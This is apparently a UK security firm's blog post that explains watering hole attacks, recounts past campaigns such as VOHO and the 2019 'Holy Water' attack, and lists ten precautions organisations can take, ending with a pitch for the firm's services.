What are Watering Hole Attacks and How Can I Avoid Them?

Got a favourite website, or one you need for work every day? That’s your “watering hole”. In watering hole attacks, cyber criminals set a trap on the website to infect your computer and network without you realising. We’ll tell you how to stay safe.

The watering hole is poisoned

In watering hole attacks, the attacker identifies a website that is often visited by users of a specific organisation or sector. The attacker then infects the website with malware, making it the ‘watering hole’ site. By discovering vulnerabilities in the main target’s cyber-security, the attacker then uses the website to deliver malware, such as a Remote Access Trojan (RAT), to exploit these flaws and hack the victim organisation.

When a member of the target organization’s device becomes infected in a way that the target does not notice – this is also called a ‘drive by’ – the attacker has access to the infected device that was used to visit the watering hole website. This allows the attacker to gain access to the target organization’s network.

Spying, stealing and even espionage

As with other tactics, the goal of this technique is to steal personal information, banking information or intellectual property, or even to conduct espionage. It can give the attacker access to business systems and assets, so they can potentially gain more information for future cyber-attacks.

Some real-life watering hole attacks

One watering hole attack in the past was the multi-phase VOHO Campaign. Attackers penetrated a local government website in Maryland, USA and a regional bank in Massachusetts in 2012, as well as other sites linked to the promotion of democracy in repressed regions. The targets were financial services, government entities, and the defence industry, and the attack included re-directs and infection with Gh0st RAT malware. The campaign redirected 32,000 visitors from 731 different global organisations to an exploit site, where approximately 4,000 hosts are believed to have downloaded exploit files, giving the attackers an astounding 12% hacking success rate.

From 2017 to 2018, a hacker organisation going by the name of “LuckyMouse” or “Iron Tiger” waged a country-wide watering-hole attack in China. An undisclosed Central Asian country’s national data centre was reportedly the target of this espionage attempt. Malicious JavaScript code was inserted into official government websites by the attackers.

The ‘Holy Water’ attack in 2019 targeted Asian religious and charitable organisations. The virus was downloaded by the attackers using an Adobe Flash update request. Although the motivation remained unknown, the incident could have been utilised for espionage.

Why are watering hole attacks a risk for my company or organisation?

A watering hole attack, similar to spear phishing, is a targeted ‘supply chain’ cyber-attack method. By luring victims to a website instead of actively trying to penetrate a network, firms are less likely to notice them and they are hard to detect actively.

Raising awareness of the issue is the first step. Following standard security best practises is always beneficial, as are some additional measures such as identifying, regularly inspecting, and monitoring websites that employees visit the most. Focus on what additional malware protection can be added to employees’ browsers and devices.

With an increasing number of sophisticated and imaginative attack tactics, many firms are adopting a ‘Zero Trust’ approach to IT security. The zero trust concept verifies users as they move around your network from application to application rather than simply setting up a perimeter and giving them freedom within it. This decreases the potential for gaps that cyber criminals might exploit with techniques such as watering hole attacks.

How to prevent watering hole attacks on your business or organisation

You can help your organisation avoid watering hole attacks by taking the following precautions:

1. Maintain up to date anti-virus and software fixes.
2. Use browser-based security technologies to warn users about sites with a poor reputation, which may be harmful, and to provide further malware protection.
3. Use a decent email security solution and think about employing a secure web gateway (SWG) to screen out suspicious traffic.
4. Inspect and monitor websites often accessed by employees, with a focus on virus identification.
5. Set up a system to promptly notify staff not to browse sites that have been recognised as hacked.
6. Before granting employee access, examine all traffic from third-party and external sites.
7. Assess, understand, and govern the whole length of your supply chain (a watering hole attack is a supply chain attack).
8. Inform, educate, and teach staff about the nature of the hazard and how to avoid it.
9. Never click on unknown or suspicious links in emails or websites, and use caution when browsing at all times.
10. Consider implementing a ‘zero trust’ security approach for your organisation.

Useful links

Find out more about Zero Trust Cyber Security

Cyber security help

As applied cyber security experts, we support hundreds of businesses and schools across the UK. Contact us to discuss how we can help you.